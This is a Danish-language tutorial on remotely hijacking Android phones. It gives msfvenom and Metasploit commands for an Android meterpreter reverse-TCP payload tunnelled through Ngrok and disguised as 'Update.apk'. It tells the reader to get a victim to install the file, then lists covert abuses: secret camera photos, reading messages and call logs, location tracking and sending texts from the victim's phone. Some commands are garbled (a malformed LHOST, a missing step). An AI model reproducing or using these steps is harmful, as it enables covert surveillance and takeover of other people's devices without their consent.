Hacking over WAN
Du kan tjekke min Video-tutorial på youtube her:
https://youtu.be/Bbp-AcejtHI
I WAN skal du først have en statisk IP/Hostname og for det andet skal du lave Port Forwarding for at tillade din trafikoverførsel, og vi ved alle, at begge dele er så svært i realtid, da vi har begrænset adgang til porte i et netværk.
Så, hvad vi vil gøre i dette scenarie, vil vi oprette en sikker tunnel ved hjælp af Ngrok.
Ngrok er et tunneling reverse proxy-system, der etablerer tunneler fra et offentligt slutpunkt, dvs. et internet, til en lokalt kørende netværkstjeneste. Dette kan hjælpe os med at oprette en offentlig HTTP/HTTPS-URL for et websted, der kører lokalt på vores maskine. Vi behøver ikke at foretage nogen form for port forwarding, mens vi bruger Ngrok, og vores netværkstjeneste vil i sidste ende eksponere til internettet ved hjælp af TCP-tunneling.
Følg disse trin for at fortsætte:
Step1: Tilmeld dig til Ngrok-konto for at downloade det.
Først skal du tilmelde dig Ngrok-konto, hvorefter du bliver bedt om at hente vinduet til downloading.
Den forwarding her angiver den TCP tunnel, som ngrok har oprettet. Forbindelsen har bundet sig til localhost på port 5555. Nu skal vi generere en ondsindet nyttelast ved hjælp af msfvenom.
Step3: Generering af nyttelast
Du kan gøre det ved at åbne en ny Terminal i din Kali Linux-maskine og derefter skrive følgende kode.
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk
Men husk, at denne gang er det en smule anderledes end det angreb, vi brugte til at udføre i LAN’et. Her skal vi i stedet for IP-adresse indtaste det forwarding-link, der er angivet i ngrok (2.tcp.ngrok.io). Og portnummeret kommer til at være 15787. Husk, at det er vigtigt at indtaste det samme portnummer, som Ngrok har givet i port forwarding.
Bemærk: Hvis det ikke virker at indtaste IP-adressen som 2.tcp.ngrok.io, kan du erstatte den med en IP-adresse, som du kan få ved hjælp af kommandoen “ping”.
Åbn en terminal og skriv ping 2.tcp.ngrok.io og tryk på enter. Du får en IP-adresse, som du skal sætte i stedet for LHOST.
Her har jeg brugt “Update.apk” som filnavn for vores payload. Denne fil skal installeres i vores måls Android-enhed. Men før vi installerer denne fil, skal vi indstille vores lytter. For at gøre det skal du følge trin 4.
Step4: Set-Up a Listener
Åbn din terminal og indlæs Metasploit-konsollen ved at skrive: msfconsole
Når den indlæses(efter et par sekunder), indlæs multi-handler exploit ved at skrive: msfconsole
use exploit/multi/handler
Sæt nu en reverse payload op ved at skrive:
set payload android/meterpreter/reverse_tcp
Sæt din LHOST som 0.0.0.0 og LPORT som 5555
(Portnummeret skal være det samme som det portnummer, der blev brugt til at binde forbindelsen i ngrok)
set LHOST 0.0.0.0.0
set LPORT 5555
Til sidst skal du skrive exploit for at starte lytteren.
Step5: Installer Malicious Update.apk-filen i målets enhed
Lad offeret installere appen, og kør den, så snart den bliver installeret. Når offeret rører ved muligheden for at åbne appen, får du adgang til alle funktioner på android-enheden. Der vil dog ikke blive vist noget på enhedens skærm, efter at appen er blevet åbnet.
Post-Exploitation
Typ hjælp for at se de forskellige muligheder, som du kan bruge til at udføre de forskellige opgaver på offerets enhed.
Du kan få adgang til deres kamera og tage et billede uden at give dem besked. Du kan også tjekke deres beskeder, opkaldslister og gemme dem i dit system.
Også kan du se og åbne ethvert program, der er installeret på deres enhed. Du kan endda få brugerens aktuelle placeringskoordinater.
Du kan også sende beskeder til et hvilket som helst kontaktnummer via deres enhed.